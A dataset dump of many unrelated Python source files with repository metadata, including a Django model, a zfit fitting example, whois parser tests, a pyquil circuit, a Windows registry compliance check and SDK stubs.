if self.foto1 and hasattr(self.foto1, 'url'):
return mark_safe(f'<img style="object-fit:cover; height:100px; width:100px" src={self.foto1.url} />')
else:
return mark_safe(f'<img style="object-fit:cover; height:100px; width:100px" src={static("/adopcion/img/no-image.png")} />')
image_tag.short_description = ''
def image_tag2(self):
if self.foto2 and hasattr(self.foto2, 'url'):
return mark_safe(f'<img style="object-fit:cover; height:100px; width:100px" src={self.foto2.url} />')
else:
return mark_safe(f'<img style="object-fit:cover; height:100px; width:100px" src={static("/adopcion/img/no-image.png")} />')
image_tag2.short_description = ''
def save(self, *args, **kwargs):
try:
this = Animal.objects.get(id=self.id)
if this.foto1 != self.foto1:
this.foto1.delete()
if this.foto2 != self.foto2:
this.foto2.delete()
except:
pass
super(Animal, self).save(*args, **kwargs)
| [
"juanzakka@gmail.com"
] | juanzakka@gmail.com |
96c5e9e11b6540e09bfed4c444788cc0a3fcee75 | 119f503a2786a929db24937c2b91d63ac9c2af72 | /examples/plot_sig_bkg.py | be5db7ccfca401c916b1cf0e9d086ed26b2c7c44 | [
"BSD-3-Clause"
] | permissive | loopylangur/zfit | f1c1e352eca5c1e58fbe276ba4b65b409f0faa6d | 535b970dfb6611ef687a184746b9e191756506ba | refs/heads/master | 2020-12-20T14:41:30.985958 | 2020-01-12T15:28:54 | 2020-01-12T15:28:54 | 236,109,089 | 0 | 0 | null | 2020-01-25T00:59:17 | 2020-01-25T00:59:16 | null | UTF-8 | Python | false | false | 2,592 | py | # Copyright (c) 2019 zfit
import numpy as np
import zfit
import matplotlib.pyplot as plt
# create space
obs = zfit.Space("x", limits=(-10, 10))
# parameters
mu = zfit.Parameter("mu", 1., -4, 6)
sigma = zfit.Parameter("sigma", 1., 0.1, 10)
lambd = zfit.Parameter("lambda", -0.06, -1, -0.01)
frac = zfit.Parameter("fraction", 0.3, 0, 1)
# model building, pdf creation
gauss = zfit.pdf.Gauss(mu=mu, sigma=sigma, obs=obs)
exponential = zfit.pdf.Exponential(lambd, obs=obs)
model = zfit.pdf.SumPDF([gauss, exponential], fracs=frac)
# data
n_sample = 10000
exp_data = exponential.sample(n=n_sample * (1 - frac)).numpy()
gauss_data = gauss.sample(n=n_sample * frac).numpy()
data = model.create_sampler(n_sample, limits=obs)
data.resample()
mu.set_value(0.5)
sigma.set_value(1.2)
lambd.set_value(-0.05)
frac.set_value(0.07)
# plot the data
data_np = data[:, 0].numpy()
color = 'black'
n_bins = 50
linewidth = 2.5
plot_scaling = n_sample / n_bins * obs.area()
x = np.linspace(-10, 10, 1000)
# plot the pdf BEFORE fitting
plt.figure()
plt.title("Before fitting")
# plot the data
plt.hist(data_np, color=color, bins=n_bins, histtype="stepfilled", alpha=0.1)
plt.hist(data_np, color=color, bins=n_bins, histtype="step")
# plot the pdfs
y = model.pdf(x).numpy()
y_gauss = (gauss.pdf(x) * frac).numpy() # notice the frac!
y_exp = (exponential.pdf(x) * (1 - frac)).numpy() # notice the frac!
plt.plot(x, y * plot_scaling, label="Sum - Model", linewidth=linewidth * 2)
plt.plot(x, y_gauss * plot_scaling, '--', label="Gauss - Signal", linewidth=linewidth)
plt.plot(x, y_exp * plot_scaling, '--', label="Exponential - Background", linewidth=linewidth)
plt.xlabel("Physical observable")
plt.legend()
# create NLL
nll = zfit.loss.UnbinnedNLL(model=model, data=data)
# create a minimizer
minimizer = zfit.minimize.Minuit()
result = minimizer.minimize(nll)
# do the error calculations, here with minos
param_errors = result.error()
plt.figure()
plt.title("After fitting")
# plot the data
plt.hist(data_np, color=color, bins=n_bins, histtype="stepfilled", alpha=0.1)
plt.hist(data_np, color=color, bins=n_bins, histtype="step")
y = model.pdf(x).numpy() # rerun now after the fitting
y_gauss = (gauss.pdf(x) * frac).numpy()
y_exp = (exponential.pdf(x) * (1 - frac)).numpy()
plt.plot(x, y * plot_scaling, label="Sum - Model", linewidth=linewidth * 2)
plt.plot(x, y_gauss * plot_scaling, '--', label="Gauss - Signal", linewidth=linewidth)
plt.plot(x, y_exp * plot_scaling, '--', label="Exponential - Background", linewidth=linewidth)
plt.xlabel("Physical observable")
plt.legend()
plt.show()
| [
"mayou36@jonas.eschle.com"
] | mayou36@jonas.eschle.com |
9ef8ca178f37669d0f1c6165b9589e22eec12759 | 8a6dbabe023deea0d29e666bc4d6d7a53a51f08d | /tests/test_drug_response.py | aa7473787c40a3b048261fec9ad60fc92a61aba5 | [
"CC-BY-NC-ND-4.0",
"Apache-2.0"
] | permissive | pasmopy/breast_cancer | 01d2c1f387364b71fc99a7a5250b0d39decd7575 | f6113dd286476069d1abc7627475e626e5cbeafc | refs/heads/master | 2023-04-10T03:08:52.806513 | 2022-09-21T15:52:03 | 2022-09-21T15:52:03 | 348,209,066 | 7 | 4 | Apache-2.0 | 2022-09-21T15:52:05 | 2021-03-16T04:05:57 | Python | UTF-8 | Python | false | false | 984 | py | import os
import shutil
import pandas as pd
from drug_response.drug.database import CancerCellLineEncyclopedia
def test_create_figs():
for dir in ["dose_response", "activity_area"]:
if os.path.isdir(dir):
shutil.rmtree(dir)
ccle = CancerCellLineEncyclopedia()
erbb_expression_ratio = pd.read_csv(
os.path.join("drug_response", "data", "ErbB_expression_ratio.csv"),
index_col=0,
)
compounds = list(set(ccle.drug_response_data["Compound"]))
for compound in compounds:
ccle.save_all(erbb_expression_ratio, compound)
for dir in ["dose_response", "activity_area"]:
assert os.path.isfile(
os.path.join(
f"{dir}",
f"{ccle._drug2target(compound)}",
f"{ccle._convert_drug_name(compound)}.pdf",
)
)
def test_cleanup():
for dir in ["dose_response", "activity_area"]:
shutil.rmtree(dir)
| [
"31299606+himoto@users.noreply.github.com"
] | 31299606+himoto@users.noreply.github.com |
72587c53ee9d480ee96056750566064d1ab30347 | 4c82c378774437b4fece5865a469485d11dd5c04 | /games/files_directories.py | 013a16b59ba58486ac2ffae7e1b4f38ad5e817c5 | [] | no_license | Cunarefa/Matrix | 54c4bbfd588d5f1a5d5889228be5224b85889538 | 634a793c1554458ab6b9b65014ba3fde279b4c4d | refs/heads/master | 2023-07-25T17:39:02.795840 | 2021-09-10T11:25:31 | 2021-09-10T11:25:31 | 401,263,945 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,145 | py | from abc import ABC, abstractmethod
class Component(ABC):
@abstractmethod
def get_size(self):
pass
def add_component(self, component):
pass
class File(Component):
def __init__(self, size):
self.size = size
def __add__(self, other):
return self.size + other.size
@property
def get_size(self):
return self.size
class Directory(Component):
def __init__(self, components):
self.components = components
self.limit = -1
# def __next__(self):
# if self.limit < len(self.components) - 1:
# self.limit += 1
# return self.components[self.limit]
# else:
# raise StopIteration
# def __iter__(self):
# return self
@property
def get_size(self):
result = 0
for i in self.components:
result += i.get_size
return result
def add_component(self, component):
self.components.append(component)
s = File(50)
d = File(20)
q = Directory([s, d])
dir = Directory([s, q])
print(dir.get_size, '\n')
dir.add_component(d)
print(dir.get_size)
| [
"yevgen.yelik@gmail.com"
] | yevgen.yelik@gmail.com |
ec7974d7ba5104cef543b2d76097554593a51e29 | a1d8b5de6a54dc942f63e2e4a946db174cae0996 | /ctci-making-anagrams/main.py | 5af3a78f3b4833c0e58dbb912cc1a9f0c63d7d09 | [
"MIT"
] | permissive | joaojunior/hackerrank | 5dae64166b6fdbec8b7bd2112443fdfde0e64e74 | a5ee0449e791535930b8659dfb7dddcf9e1237de | refs/heads/master | 2021-11-22T07:53:33.978238 | 2021-09-28T00:35:16 | 2021-09-28T00:35:16 | 116,694,043 | 0 | 1 | MIT | 2018-02-21T00:29:09 | 2018-01-08T15:29:26 | Python | UTF-8 | Python | false | false | 354 | py | def make_anagrams(a, b):
d_a = {}
d_b = {}
qty = 0
for c in a:
d_a[c] = d_a.get(c, 0) + 1
for c in b:
d_b[c] = d_b.get(c, 0) + 1
for c, frequency in d_a.items():
qty += abs(frequency - d_b.get(c, 0))
for c, frequency in d_b.items():
if c not in d_a:
qty += frequency
return qty
| [
"jcajcefet@yahoo.com.br"
] | jcajcefet@yahoo.com.br |
adfe0cf1de9c32946f939923d8014e797f2e7db0 | 01fdd206c8c825b30870bdd3f6e75f0aa113b849 | /test/record/parser/test_response_whois_isoc_org_il_property_status_transfer_allowed.py | 3e8870b0af59fcdedef88641297afba471c8dc7e | [
"MIT"
] | permissive | huyphan/pyyawhois | 0fbc5a7d64a53ae6e3393fdc1c7ff0d0ac5f22b5 | 77fb2f73a9c67989f1d41d98f37037406a69d136 | refs/heads/master | 2021-01-23T22:42:55.989651 | 2015-09-19T16:40:06 | 2015-09-19T16:40:06 | 23,335,785 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 963 | py |
# This file is autogenerated. Do not edit it manually.
# If you want change the content of this file, edit
#
# spec/fixtures/responses/whois.isoc.org.il/property_status_transfer_allowed
#
# and regenerate the tests with the following script
#
# $ scripts/generate_tests.py
#
from nose.tools import *
from dateutil.parser import parse as time_parse
import yawhois
class TestWhoisIsocOrgIlPropertyStatusTransferAllowed(object):
def setUp(self):
fixture_path = "spec/fixtures/responses/whois.isoc.org.il/property_status_transfer_allowed.txt"
host = "whois.isoc.org.il"
part = yawhois.record.Part(open(fixture_path, "r").read(), host)
self.record = yawhois.record.Record(None, [part])
def test_status(self):
eq_(self.record.status, 'registered')
def test_available(self):
eq_(self.record.available, False)
def test_registered(self):
eq_(self.record.registered, True)
| [
"dachuy@gmail.com"
] | dachuy@gmail.com |
ba5c8b5a65db1e493db1a3389552f2447aac39b0 | be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1 | /Gauss_v45r10p1/Gen/DecFiles/options/11110011.py | 6a4ef801f0e27b7b31926ae3ec0e52db71d2bbe9 | [] | no_license | Sally27/backup_cmtuser_full | 34782102ed23c6335c48650a6eaa901137355d00 | 8924bebb935b96d438ce85b384cfc132d9af90f6 | refs/heads/master | 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,132 | py | # file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/11110011.py generated: Wed, 25 Jan 2017 15:25:20
#
# Event Type: 11110011
#
# ASCII decay Descriptor: {[[B0]nos -> mu+ (tau- -> pi+ pi- pi- nu_tau) (K*(892)0 -> K+ pi-)]cc, [[B0]nos -> (tau+ -> pi+ pi- pi+ anti-nu_tau) mu- (K*(892)0 -> K+ pi-)]cc, [[B0]os -> mu- (tau+ -> pi+ pi- pi+ anti-nu_tau) (K*(892)~0 -> K- pi+)]cc, [[B0]os -> (tau- -> pi+ pi- pi- nu_tau) mu+ (K*(892)~0 -> K- pi+)]cc}
#
from Configurables import Generation
Generation().EventType = 11110011
Generation().SampleGenerationTool = "SignalRepeatedHadronization"
from Configurables import SignalRepeatedHadronization
Generation().addTool( SignalRepeatedHadronization )
Generation().SignalRepeatedHadronization.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Bd_Ksttaumu,3pi=DecProdCut,tauolababar.dec"
Generation().SignalRepeatedHadronization.CutTool = "DaughtersInLHCb"
Generation().SignalRepeatedHadronization.SignalPIDList = [ 511,-511 ]
| [
"slavomirastefkova@b2pcx39016.desy.de"
] | slavomirastefkova@b2pcx39016.desy.de |
cb8dcbaeebb340b0047d76d8fbbc2286bb66e39b | 21e7753732296bfdfb6dd9a9b58c7c6b8d90a1e5 | /ArraysAndStrings/IsUnique/IsUnique.py | 4841949c494375e7ad7ad4044c532c52a0ddc5b6 | [] | no_license | rongfeng-china/python-algorithms-and-data-structures | eb8514b44d7ff97dd7c4deda2d8ea888a5aa8d04 | a69241bb7b684bc7d00acdd46c2fc214f7b61887 | refs/heads/master | 2020-03-13T09:08:13.375870 | 2015-12-11T07:37:30 | 2015-12-11T07:37:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 720 | py | # Accepts a string and returns true if all chars in the string are
# unique. Returns false otherwise. Assumes strings made up of
# lowercase letters 'a' through 'z'
def isUniqueChars(str):
checker = 0
for c in str:
value = ord(c) - ord('a')
if (checker & (1 << value)) > 0:
return False
checker |= (1 << value)
return True
# Below implementation assumes ASCII strings - 128 unique chars. This
# helps to achieve both O(1) time and space complexities (actually
# O(128))
def isUniqueCharsASCII(str):
if len(str) > 128:
return false
checker = [False] * 128
for c in str:
value = ord(c) # Returns the ASCII for a char
if checker[value] is True:
return False
checker[value] = True
return True
| [
"prathamt@outlook.com"
] | prathamt@outlook.com |
f2b8894c23d54c6d333e01186a92793a177ca940 | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/226/users/4424/codes/1637_2443.py | da74fa2d94940f25db95693ea2d3556c85cc5da1 | [] | no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py | # Teste seu código aos poucos.
# Não teste tudo no final, pois fica mais difícil de identificar erros.
# Use as mensagens de erro para corrigir seu código.
from math import*
r = float(input("Digite um numero: "))
h = float(input("Digite um numero: "))
n = float(input("Digite um numero: "))
if(n==1):
x=((pi*h**2)*(3*r-h))/3
if(n==2):
x=((4*pi*r**3)/3)-((pi*h**2)*(3*r-h))/3
print(round(x, 4)) | [
"jvlo@icomp.ufam.edu.br"
] | jvlo@icomp.ufam.edu.br |
06d7833c5cf9a4d4c3c82424abe3000b5fccce9a | 34599596e145555fde0d4264a1d222f951f49051 | /pcat2py/class/212441d0-5cc5-11e4-af55-00155d01fe08.py | ce239a839bec9440133bfd44d09eebdbf2016b3e | [
"MIT"
] | permissive | phnomcobra/PCAT2PY | dc2fcbee142ce442e53da08476bfe4e68619346d | 937c3b365cdc5ac69b78f59070be0a21bdb53db0 | refs/heads/master | 2021-01-11T02:23:30.669168 | 2018-02-13T17:04:03 | 2018-02-13T17:04:03 | 70,970,520 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,467 | py | #!/usr/bin/python
################################################################################
# 212441d0-5cc5-11e4-af55-00155d01fe08
#
# Justin Dierking
# justindierking@hardbitsolutions.com
# phnomcobra@gmail.com
#
# 10/24/2014 Original Construction
################################################################################
class Finding:
def __init__(self):
self.output = []
self.is_compliant = False
self.uuid = "212441d0-5cc5-11e4-af55-00155d01fe08"
def check(self, cli):
# Initialize Compliance
self.is_compliant = False
# Get Registry DWORD
dword = cli.get_reg_dword(r'HKLM:\Software\Policies\Microsoft\Windows NT\Terminal Services', 'DisablePasswordSaving')
# Output Lines
self.output = [r'HKLM:\Software\Policies\Microsoft\Windows NT\Terminal Services', ('DisablePasswordSaving=' + str(dword))]
if dword == 1:
self.is_compliant = True
return self.is_compliant
def fix(self, cli):
cli.powershell(r"New-Item -path 'HKLM:\Software\Policies\Microsoft'")
cli.powershell(r"New-Item -path 'HKLM:\Software\Policies\Microsoft\Windows NT'")
cli.powershell(r"New-Item -path 'HKLM:\Software\Policies\Microsoft\Windows NT\Terminal Services'")
cli.powershell(r"Set-ItemProperty -path 'HKLM:\Software\Policies\Microsoft\Windows NT\Terminal Services' -name 'DisablePasswordSaving' -value 1 -Type DWord")
| [
"phnomcobra@gmail.com"
] | phnomcobra@gmail.com |
a33256408c609682eb43687b84b9c799e96b48e9 | 7c44b3e06bd9d212b81e1d237c2bf945940b8893 | /numpy_pandas_matplotlib/matplotlib_and_seaborn_part_1/bar_chart_practice.py | c76603b8b5de4ae08b6b6ee2a954a9fd4a89edfe | [] | no_license | sivaneshl/ai_programming_with_python | e89f9faf566b01b844fe83329dd3e54257141397 | 75801197fcc1ebbb827cc9c8cf7c8ab9e373e1e2 | refs/heads/master | 2022-04-11T07:58:50.148433 | 2020-04-05T05:22:16 | 2020-04-05T05:22:16 | 248,581,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,890 | py | # prerequisite package imports
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sb
pokemon = pd.read_csv('pokemon.csv')
print(pokemon.head())
# Task 1: There have been quite a few Pokémon introduced over the series' history. How many were introduced in each
# generation? Create a bar chart of these frequencies using the 'generation_id' column.
base_color = sb.color_palette()[0]
# n_pkmn_gen = pokemon.groupby(['generation_id'])['id'].agg(count=np.size)
# sb.barplot(n_pkmn_gen.index.values, n_pkmn_gen['count'], color=base_color)
sb.countplot(data=pokemon[['generation_id','id']], x='generation_id', color=base_color)
plt.show()
# Task 2: Each Pokémon species has one or two 'types' that play a part in its offensive and defensive capabilities.
# How frequent is each type? The code below creates a new dataframe that puts all of the type counts in a single column.
pkmn_types = pokemon.melt(id_vars=['id','species'],
value_vars=['type_1', 'type_2'],
var_name='type_level',
value_name='type').dropna()
# pkmn_types.head()
# Your task is to use this dataframe to create a relative frequency plot of the proportion of Pokémon with each type,
# sorted from most frequent to least. Hint: The sum across bars should be greater than 100%, since many Pokémon have
# two types. Keep this in mind when considering a denominator to compute relative frequencies.
type_counts = pkmn_types['type'].value_counts()
type_order = type_counts.index
n_pokemon = pokemon.shape[0]
max_type_count = type_counts[0]
max_prop = max_type_count / n_pokemon
ticks_prop = np.arange(0, max_prop, 0.02)
tick_names = ['{:0.2f}'.format(x) for x in ticks_prop]
sb.countplot(data=pkmn_types, y='type', color=base_color, order=type_order)
plt.xticks(ticks_prop * n_pokemon, tick_names)
plt.show() | [
"sivaneshl@virtusa.com"
] | sivaneshl@virtusa.com |
d9e20c42cd6f1cd9777d48d2c582d65d0e74ca28 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_206/1009.py | d384122c55980468d170b2657602724644c3e86d | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | py | t=input()
m=1
while m<=t:
n,d=map(int,raw_input().split())
ti=[]
while d:
d-=1
a,v=map(int,raw_input().split())
ti.append(float(n-a)/float(v))
ti=max(ti)
print "Case #"+str(m)+": {0:.6f}".format(round(float(n)/float(ti),6))
m+=1 | [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
5b370a69edfe4fc04c6aecace8d9746361dbb566 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/loadtesting/azure-mgmt-loadtesting/azure/mgmt/loadtesting/operations/__init__.py | 402d17a0616ec39fabd982a5382b8a74612463d5 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 917 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from ._operations import Operations
from ._quotas_operations import QuotasOperations
from ._load_tests_operations import LoadTestsOperations
from ._patch import __all__ as _patch_all
from ._patch import * # pylint: disable=unused-wildcard-import
from ._patch import patch_sdk as _patch_sdk
__all__ = [
"Operations",
"QuotasOperations",
"LoadTestsOperations",
]
__all__.extend([p for p in _patch_all if p not in __all__])
_patch_sdk()
| [
"noreply@github.com"
] | Azure.noreply@github.com |
38ff0aebf3aeaaff4c9604670e7270beb6611cde | 94ca5a956889a1263bb58fc9b8624455503783cd | /page/storagebox/personinfo.py | 686ff5550dfec556681b1a366cf3509647dcb18c | [] | no_license | xmaimiao/wmAPP | 50bfbd5c50982cae0723fa3ce3f3f8c59314403b | b427f0afaccde0d939b275f9f48724d404257f1e | refs/heads/master | 2023-03-27T05:16:31.920995 | 2021-03-29T07:31:11 | 2021-03-29T07:31:11 | 352,554,192 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,285 | py | from appium.webdriver.common.mobileby import MobileBy
from page.basepage import BasePage
from page.storagebox.editpage import EditPage
class PersonInfo(BasePage):
edit_ele = (MobileBy.XPATH,'//button[@class="van-button van-button--primary van-button--large van-button--plain van-button--block"]')
def goto_editpage(self):
# print(f"在個人信息頁面打印url1:{self.driver.current_url}")
# print(f"在個人信息頁面打印上下文1:{self.driver.current_context}")
# print(f"在個人信息頁面打印上下文2:{self.driver.current_context}")
# print(f"在個人信息頁面打印窗口句柄:{self.driver.window_handles}")
# print(f"在個人信息頁面打印當前窗口句柄1:{self.driver.current_window_handle}")
self.driver.switch_to_window(self.driver.window_handles[-1])
# print(f"在個人信息頁面打印窗口句柄:{self.driver.window_handles}")
# print(f"在個人信息頁面打印當前窗口句柄2:{self.driver.current_window_handle}")
# print(f"在個人信息頁面打印上下文3:{self.driver.current_context}")
# print(f"在個人信息頁面打印url2:{self.driver.current_url}")
self.find_and_click(self.edit_ele)
return EditPage(self.driver) | [
"765120214@qq.com"
] | 765120214@qq.com |
fe735cb9f61a0d4d595382311f8f59fc71f50011 | 80d50ea48e10674b1b7d3f583a1c4b7d0b01200f | /src/datadog_api_client/v1/model/i_frame_widget_definition_type.py | 4b9a12abbd72dab5bebb2895c3a106438d65446c | [
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"MPL-2.0"
] | permissive | DataDog/datadog-api-client-python | 3e01fa630278ad0b5c7005f08b7f61d07aa87345 | 392de360e7de659ee25e4a6753706820ca7c6a92 | refs/heads/master | 2023-09-01T20:32:37.718187 | 2023-09-01T14:42:04 | 2023-09-01T14:42:04 | 193,793,657 | 82 | 36 | Apache-2.0 | 2023-09-14T18:22:39 | 2019-06-25T22:52:04 | Python | UTF-8 | Python | false | false | 857 | py | # Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.
from __future__ import annotations
from datadog_api_client.model_utils import (
ModelSimple,
cached_property,
)
from typing import ClassVar
class IFrameWidgetDefinitionType(ModelSimple):
"""
Type of the iframe widget.
:param value: If omitted defaults to "iframe". Must be one of ["iframe"].
:type value: str
"""
allowed_values = {
"iframe",
}
IFRAME: ClassVar["IFrameWidgetDefinitionType"]
@cached_property
def openapi_types(_):
return {
"value": (str,),
}
IFrameWidgetDefinitionType.IFRAME = IFrameWidgetDefinitionType("iframe")
| [
"noreply@github.com"
] | DataDog.noreply@github.com |
d22ec5d91e8e2f8415c562b398f5064d16e44272 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02380/s032648197.py | e45329928543031c03cf6ec6f6bb061bf46b86d1 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 281 | py | import math
a, b, C = map(float, input().split())
S = (a * b * math.sin(math.radians(C))) / 2
L = a + b + (math.sqrt(a**2 + b**2 - 2*a*b*math.cos(math.radians(C))))
h = b * math.sin(math.radians(C))
print("{:.8f}".format(S))
print("{:.8f}".format(L))
print("{:.8f}".format(h))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
9d448fa4788fc7db4f9ad0d3f889f2f0add779c3 | a9937139b1af85180cea706a52d447abce2430f4 | /a/cwiczenie_4-1/BMI.py | e4e109f6ff184f3c7a759b39f3ad213864c556ca | [] | no_license | MirekPz/Altkom | 8f16014d43adb10e87804ae2b5d23151924cb226 | 0a49e75e681593b41d07cbff63dea0723a11756b | refs/heads/master | 2020-09-29T00:12:37.990353 | 2019-12-13T15:52:30 | 2019-12-13T15:52:30 | 226,899,295 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 679 | py | wzrost = float(input("Podaj wzrost [m]; "))
waga = float(input("Podaj wagę [kg]; "))
BMI = waga/wzrost**2
print(round(BMI, 2))
if BMI < 16:
print("Wygłodzenie")
elif BMI <=16.99:
print("Wychudzenie")
elif BMI <= 18.49:
print("Niedowaga")
elif BMI <= 24.99:
print("Wartość prawidłowa:")
elif BMI <= 29.99:
print("Nadwaga")
elif BMI <= 34.99:
print("I stopień otyłości")
elif BMI <= 39.99:
print("II stopień otyłości (otyłość kliniczna)")
else:
print("III stopień otyłości (otyłość skrajna)")
print(f"Przedział prawidłowej wagi dla określonego wzrostu: [{round(18.49 * wzrost**2, 1)} , {round(24.99 * wzrost**2, 1)}]")
| [
"mirek@info-tur.pl"
] | mirek@info-tur.pl |
388d322e7321b6221b4e638c5421221acdb06151 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startPyquil2978.py | 9e6b9ff316ab2c467b06cfb9f702676e859600a3 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,959 | py | # qubit number=4
# total number=46
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program() # circuit begin
prog += CNOT(0,3) # number=10
prog += H(3) # number=40
prog += CZ(0,3) # number=41
prog += H(3) # number=42
prog += CNOT(0,3) # number=33
prog += X(3) # number=34
prog += CNOT(0,3) # number=35
prog += CNOT(0,3) # number=25
prog += CNOT(0,3) # number=12
prog += H(2) # number=30
prog += CZ(0,2) # number=31
prog += H(2) # number=32
prog += CNOT(0,2) # number=43
prog += X(2) # number=44
prog += CNOT(0,2) # number=45
prog += H(2) # number=36
prog += CZ(0,2) # number=37
prog += H(2) # number=38
prog += H(1) # number=2
prog += H(2) # number=3
prog += H(3) # number=4
prog += H(0) # number=5
prog += H(3) # number=16
prog += CZ(1,3) # number=17
prog += H(3) # number=18
prog += H(1) # number=6
prog += H(2) # number=7
prog += H(3) # number=8
prog += H(0) # number=9
prog += H(2) # number=39
prog += H(0) # number=26
prog += CZ(3,0) # number=27
prog += H(0) # number=28
prog += CNOT(3,0) # number=14
prog += Y(2) # number=29
# circuit end
return prog
def summrise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('4q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil2978.csv","w")
print(summrise_results(bitstrings),file=writefile)
writefile.close()
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
218eff2b76cfe7f74adbaddd19c69e8b4a65b612 | bc441bb06b8948288f110af63feda4e798f30225 | /cmdb_sdk/model/container/hpa_pb2.pyi | ba9ca505ff5c447e180d7f7fc8dc3ec1ccd8f670 | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,592 | pyi | # @generated by generate_proto_mypy_stubs.py. Do not edit!
import sys
from cmdb_sdk.model.container.resource_metric_source_pb2 import (
ResourceMetricSource as cmdb_sdk___model___container___resource_metric_source_pb2___ResourceMetricSource,
)
from google.protobuf.descriptor import (
Descriptor as google___protobuf___descriptor___Descriptor,
)
from google.protobuf.internal.containers import (
RepeatedCompositeFieldContainer as google___protobuf___internal___containers___RepeatedCompositeFieldContainer,
)
from google.protobuf.message import (
Message as google___protobuf___message___Message,
)
from typing import (
Iterable as typing___Iterable,
Optional as typing___Optional,
Text as typing___Text,
Union as typing___Union,
)
from typing_extensions import (
Literal as typing_extensions___Literal,
)
builtin___bool = bool
builtin___bytes = bytes
builtin___float = float
builtin___int = int
if sys.version_info < (3,):
builtin___buffer = buffer
builtin___unicode = unicode
class HorizontalPodAutoscaler(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class ScaleTargetRef(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
kind = ... # type: typing___Text
name = ... # type: typing___Text
apiVersion = ... # type: typing___Text
def __init__(self,
*,
kind : typing___Optional[typing___Text] = None,
name : typing___Optional[typing___Text] = None,
apiVersion : typing___Optional[typing___Text] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> HorizontalPodAutoscaler.ScaleTargetRef: ...
else:
